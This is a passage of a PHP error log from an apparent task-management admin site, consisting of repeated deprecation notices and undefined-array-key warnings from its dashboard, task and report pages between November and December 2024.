deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:11:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:21:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Nov-2024 11:51:50 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Nov-2024 14:09:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Nov-2024 14:09:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Nov-2024 14:11:25 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Nov-2024 20:45:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Nov-2024 20:45:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [08-Nov-2024 20:45:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [16-Nov-2024 12:34:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Nov-2024 12:37:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 10:56:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 10:56:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:08:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:11:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:11:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:20:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:21:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:26:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:42:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 11:42:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [26-Nov-2024 11:42:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [26-Nov-2024 11:42:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [26-Nov-2024 11:42:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [26-Nov-2024 11:50:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 14:37:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 14:37:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [26-Nov-2024 14:37:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [26-Nov-2024 14:38:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [26-Nov-2024 14:38:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [26-Nov-2024 14:41:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 14:41:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 14:42:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Nov-2024 14:48:14 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Nov-2024 22:27:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Nov-2024 22:27:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [02-Dec-2024 10:51:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 15:28:47 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 15:28:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [02-Dec-2024 15:28:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [02-Dec-2024 15:30:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 15:30:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [02-Dec-2024 15:30:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [02-Dec-2024 15:30:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [02-Dec-2024 15:30:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [02-Dec-2024 15:39:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 17:05:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 17:07:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 17:08:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 17:30:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 17:30:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Dec-2024 19:18:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Dec-2024 19:19:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [03-Dec-2024 19:19:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [03-Dec-2024 19:20:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [03-Dec-2024 19:20:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [03-Dec-2024 19:34:52 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 15:38:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 18:22:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 18:22:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 21:30:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 22:01:30 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:01:50 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:01:57 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:02:05 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:02:06 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in 